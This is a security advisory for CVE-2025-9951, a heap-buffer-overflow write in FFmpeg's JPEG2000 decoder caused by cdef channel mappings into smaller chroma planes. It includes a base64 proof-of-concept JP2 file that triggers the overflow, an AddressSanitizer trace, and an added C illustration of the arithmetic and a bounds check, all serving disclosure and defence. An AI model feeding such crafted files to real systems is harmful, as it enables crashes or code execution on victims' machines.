
FFmpeg - Heap-buffer-overflow write in jpeg2000dec

High
rcorrea35 published GHSA-39q3-f8jq-v6mg Sep 8, 2025

Package

JPEG2000 (FFmpeg)

Affected versions

< ffmpeg 8.0

Patched versions

None

Description

Summary

The vulnerability lies in the Channel Definition (cdef) box of the JP2 container, which defines the mapping of codestream components to colour channels. If a chroma-subsampled pixel format is used together with a cdef box, a corner case can be triggered: the mapping is honoured even when the component and the plane it is mapped to do not have the same dimensions. For example, for a YUV420P frame with a 64x32 resolution, the Y plane buffer is 64*32+16+63=2127 bytes, and the U and V plane buffers are 64*32/2+16+63=1103 bytes each. By choosing a cdef entry with cn=0 and asoc=2, the data of the full-resolution luma component Y (height 32) is written into the smaller subsampled chroma plane U (height 16), thus overflowing the frame buffer picture->data[plane] by 64*16=1024 bytes.
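The following C program is an added illustration of the mechanism above; it is not FFmpeg code and not the project's fix. It parses the cdef box as it appears in the poc.jp2 given below under Proof of Concept (the 28 bytes decoded from that base64: N=3, entries (cn,typ,asoc) = (0,0,2), (1,0,2), (2,0,2)), derives component and plane geometry for the 64x32 YUV420P case, reproduces the overflow arithmetic from the description without performing any out-of-bounds write, and shows the consistency check a decoder needs before honouring a cdef mapping. The 64-byte linesize alignment and the 16+63 byte allocation pad are assumptions chosen to reproduce the 2127/1103-byte plane sizes quoted above, and the asoc-to-plane rule (asoc k selects plane k-1, asoc 0 selects no plane) is a simplification of the description, not FFmpeg's own table.

```c
/* Added example, not FFmpeg code: parse a JP2 'cdef' box and check that the
 * component -> plane mapping it requests fits the output pixel format. */
#include <stdint.h>
#include <stddef.h>
#include <string.h>
#include <stdio.h>

#define ALIGN_UP(x, a) (((x) + (a) - 1) / (a) * (a))

typedef struct { uint16_t cn, typ, asoc; } CdefEntry;
typedef struct { int w, h, dx, dy; } Comp;                 /* codestream component (SIZ) */
typedef struct { int w, h, linesize; long alloc; } Plane;  /* one output frame plane */

/* 'cdef' box of the advisory's poc.jp2, decoded from its base64 (28 bytes):
 * LBox=0x1C, TBox='cdef', N=3, then (Cn,Typ,Asoc) = (0,0,2) (1,0,2) (2,0,2). */
static const uint8_t POC_CDEF[28] = {
    0x00,0x00,0x00,0x1C, 'c','d','e','f', 0x00,0x03,
    0x00,0x00, 0x00,0x00, 0x00,0x02,
    0x00,0x01, 0x00,0x00, 0x00,0x02,
    0x00,0x02, 0x00,0x00, 0x00,0x02,
};

static uint16_t rd16(const uint8_t *p) { return (uint16_t)((p[0] << 8) | p[1]); }
static uint32_t rd32(const uint8_t *p)
{
    return ((uint32_t)p[0] << 24) | ((uint32_t)p[1] << 16) | ((uint32_t)p[2] << 8) | p[3];
}

/* Parse a 'cdef' box: LBox(4) TBox(4) N(2), then N entries of Cn,Typ,Asoc (uint16 BE).
 * Returns N, or -1 if the box is not a well-formed cdef box or is truncated. */
int parse_cdef_box(const uint8_t *box, size_t len, CdefEntry *out, int max_out)
{
    if (len < 10) return -1;
    uint32_t lbox = rd32(box);
    if (lbox < 10 || lbox > len || memcmp(box + 4, "cdef", 4) != 0) return -1;
    int n = rd16(box + 8);
    if (n > max_out || 10 + 6 * (size_t)n > lbox) return -1;
    for (int i = 0; i < n; i++) {
        const uint8_t *e = box + 10 + 6 * i;
        out[i].cn = rd16(e); out[i].typ = rd16(e + 2); out[i].asoc = rd16(e + 4);
    }
    return n;
}

/* Component geometry from SIZ: image size divided by XRsiz/YRsiz, rounded up. */
Comp comp_from_siz(int xsiz, int ysiz, int dx, int dy)
{
    Comp c = { (xsiz + dx - 1) / dx, (ysiz + dy - 1) / dy, dx, dy };
    return c;
}

/* YUV420P plane geometry. Assumption for this model: linesize aligned to 64 and a
 * 16 + 63 byte allocation pad, which reproduces the advisory's 2127/1103 sizes. */
Plane yuv420p_plane(int idx, int w, int h)
{
    Plane p;
    p.w = idx ? (w + 1) / 2 : w;
    p.h = idx ? (h + 1) / 2 : h;
    p.linesize = ALIGN_UP(p.w, 64);
    p.alloc = (long)p.linesize * p.h + 16 + 63;
    return p;
}

/* Plane selected by a cdef association (simplified rule, not FFmpeg's table):
 * Asoc 1..3 selects plane 0..2; Asoc 0 ("whole image") and anything else gets -1. */
int plane_for_asoc(uint16_t asoc) { return (asoc >= 1 && asoc <= 3) ? asoc - 1 : -1; }

/* Unchecked row-by-row write of component c into plane p: bytes landing past the
 * plane's nominal area (h * linesize). Component 0 -> plane 1 gives 64*16 = 1024. */
long bytes_past_plane(const Comp *c, const Plane *p)
{
    long written = (long)c->h * p->linesize;
    long area = (long)p->h * p->linesize;
    return written > area ? written - area : 0;
}

/* The same write measured against the allocation (the ASan region): 2048 - 1103 = 945. */
long bytes_past_alloc(const Comp *c, const Plane *p)
{
    long written = (long)c->h * p->linesize;
    return written > p->alloc ? written - p->alloc : 0;
}

/* Hardened check: only honour a mapping whose component fits the target plane. */
int cdef_mapping_is_safe(const Comp *c, const Plane *p)
{
    return c->w <= p->w && c->h <= p->h && c->w <= p->linesize;
}

int main(void)
{
    CdefEntry e[4];
    int n = parse_cdef_box(POC_CDEF, sizeof POC_CDEF, e, 4);
    int dx[3] = {1, 2, 2}, dy[3] = {1, 2, 2};   /* XRsiz/YRsiz of the PoC's three components (4:2:0) */
    for (int i = 0; i < n; i++) {
        int pl = plane_for_asoc(e[i].asoc);
        if (e[i].cn >= 3 || pl < 0) { printf("entry %d: unusable cn/asoc, reject\n", i); continue; }
        Comp c = comp_from_siz(64, 32, dx[e[i].cn], dy[e[i].cn]);
        Plane p = yuv420p_plane(pl, 64, 32);
        printf("cn=%u -> plane %d: %ld bytes past plane, %ld past allocation, %s\n",
               (unsigned)e[i].cn, pl, bytes_past_plane(&c, &p), bytes_past_alloc(&c, &p),
               cdef_mapping_is_safe(&c, &p) ? "accepted" : "rejected");
    }
    return 0;
}
```

For the PoC's first entry the model reports 1024 bytes past the U plane's nominal area (the advisory's figure) and 945 bytes past the 1103-byte allocation, which is where the first out-of-bounds byte in the ASan report lands; the check rejects that entry while accepting a same-geometry mapping such as the chroma components into the chroma planes.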

Severity

High - Allows an attacker to potentially gain remote code execution or cause denial of service.

Proof of Concept

The following base64-encoded poc.jp2 triggers the AddressSanitizer report below:

AAAADGpQICANCocKAAAAFGZ0eXBqcDIgAAAAAGpwMiAAAABJanAyaAAAABZpaGRyAAAAIAAAAEAA
AwgHAAAAAAAPY29scgEAAAAAABIAAAAcY2RlZgADAAAAAAACAAEAAAACAAIAAAACAAAAympwMmP/
T/9RAC8AAAAAAEAAAAAgAAAAAAAAAAAQAAAAEAAAAAAAAAAAAAAAAAMHAQEHAgIHAgL/UgAMAAAA
AQAGAgIAAf9cABYgQEhIUEhIUEhIUEhIUEhIUEhIUP+QAAoAAAAAAGcAAf+T32gQCYf/AAgH/wAI
BwAAAKHzggABuwAAp9oMC0FzRGLwAACj6gkACchYhMatzBLXAACh848AZRCkKnPzhveC/MUI/qlg
AACx+oF/UCiMWOlqioxY6WqKAAD/2Q==

ASan report:

==1929947==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x51a0000106cf at pc 0x5643c58b5858 bp 0x7fe552bfe410 sp 0x7fe552bfe408
WRITE of size 1 at 0x51a0000106cf thread T1 (av:jpeg200:df0)
    #0 0x5643c58b5857 in write_frame_8 libavcodec/jpeg2000dec.c:2368:1
    #1 0x5643c58b5857 in jpeg2000_decode_tile libavcodec/jpeg2000dec.c:2389:9
    #2 0x5643c51560ad in avcodec_default_execute2 libavcodec/avcodec.c:92:17
    #3 0x5643c58ae7d7 in jpeg2000_decode_frame libavcodec/jpeg2000dec.c:2903:5
    #4 0x5643c53b03f4 in decode_simple_internal libavcodec/decode.c:439:16
    #5 0x5643c53b03f4 in decode_simple_receive_frame libavcodec/decode.c:597:15
    #6 0x5643c53b03f4 in ff_decode_receive_frame_internal libavcodec/decode.c:633:15
    #7 0x5643c5ca20dc in frame_worker_thread libavcodec/pthread_frame.c:295:19
    #8 0x5643c424855a in asan_thread_start(void*) asan_interceptors.cpp.o
    #9 0x7fe555a33b7a in start_thread nptl/pthread_create.c:448:8
    #10 0x7fe555ab17b7 in __GI___clone3 misc/../sysdeps/unix/sysv/linux/x86_64/clone3.S:78

0x51a0000106cf is located 0 bytes after 1103-byte region [0x51a000010280,0x51a0000106cf)
allocated by thread T1 (av:jpeg200:df0) here:
    #0 0x5643c424b70b in posix_memalign
    #1 0x5643c774c426 in av_malloc libavutil/mem.c:107:9
    #2 0x5643c7702fd7 in av_buffer_alloc libavutil/buffer.c:82:12
    #3 0x5643c7702fd7 in av_buffer_allocz libavutil/buffer.c:95:24
    #4 0x5643c7705007 in pool_alloc_buffer libavutil/buffer.c:369:26
    #5 0x5643c7705007 in av_buffer_pool_get libavutil/buffer.c:407:15
    #6 0x5643c5650349 in video_get_buffer libavcodec/get_buffer.c:233:23
    #7 0x5643c5650349 in avcodec_default_get_buffer2 libavcodec/get_buffer.c:285:16
    #8 0x5643c53b76d4 in ff_get_buffer libavcodec/decode.c:1683:11
    #9 0x5643c5ca1781 in thread_get_buffer_internal libavcodec/pthread_frame.c:1041:11
    #10 0x5643c5ca1781 in ff_thread_get_buffer libavcodec/pthread_frame.c:1050:15
    #11 0x5643c58aceed in jpeg2000_decode_frame libavcodec/jpeg2000dec.c:2882:16
    #12 0x5643c53b03f4 in decode_simple_internal libavcodec/decode.c:439:16
    #13 0x5643c53b03f4 in decode_simple_receive_frame libavcodec/decode.c:597:15
    #14 0x5643c53b03f4 in ff_decode_receive_frame_internal libavcodec/decode.c:633:15
    #15 0x5643c5ca20dc in frame_worker_thread libavcodec/pthread_frame.c:295:19
    #16 0x5643c424855a in asan_thread_start(void*) asan_interceptors.cpp.o

Thread T1 (av:jpeg200:df0) created by T0 here:
    #0 0x5643c4230115 in pthread_create
    #1 0x5643c40df235 in init_thread libavcodec/pthread_frame.c:912:11
    #2 0x5643c40deaa8 in ff_frame_thread_init libavcodec/pthread_frame.c:971:15
    #3 0x5643c5156d2f in avcodec_open2 libavcodec/avcodec.c:328:15
    #4 0x5643c428e011 in dec_open fftools/ffmpeg_dec.c:1601:16
    #5 0x5643c428ced0 in dec_init fftools/ffmpeg_dec.c:1666:11
    #6 0x5643c4296c28 in ist_use fftools/ffmpeg_demux.c:993:15
    #7 0x5643c429720b in ist_filter_add fftools/ffmpeg_demux.c:1029:11
    #8 0x5643c42b0b10 in ifilter_bind_ist fftools/ffmpeg_filter.c:685:11
    #9 0x5643c42b06b4 in fg_create_simple fftools/ffmpeg_filter.c:1234:11
    #10 0x5643c42d704e in ost_bind_filter fftools/ffmpeg_mux_init.c:1000:15
    #11 0x5643c42d1a99 in ost_add fftools/ffmpeg_mux_init.c:1536:15
    #12 0x5643c42cf1e5 in map_auto_video fftools/ffmpeg_mux_init.c:1640:16
    #13 0x5643c42c5b37 in create_streams fftools/ffmpeg_mux_init.c:1969:19
    #14 0x5643c42c5b37 in of_open fftools/ffmpeg_mux_init.c:3335:11
    #15 0x5643c42db146 in open_files fftools/ffmpeg_opt.c:1367:15
    #16 0x5643c42db146 in ffmpeg_parse_options fftools/ffmpeg_opt.c:1423:11
    #17 0x5643c431c06f in main fftools/ffmpeg.c:991:11
    #18 0x7fe5559caca7 in __libc_start_call_main csu/../sysdeps/nptl/libc_start_call_main.h:58:16

Timeline

Date reported: 08/04/2025
Date fixed: 08/06/2025
Date disclosed: 09/08/2025

Severity

High

CVE ID

CVE-2025-9951

Weaknesses

No CWEs

Credits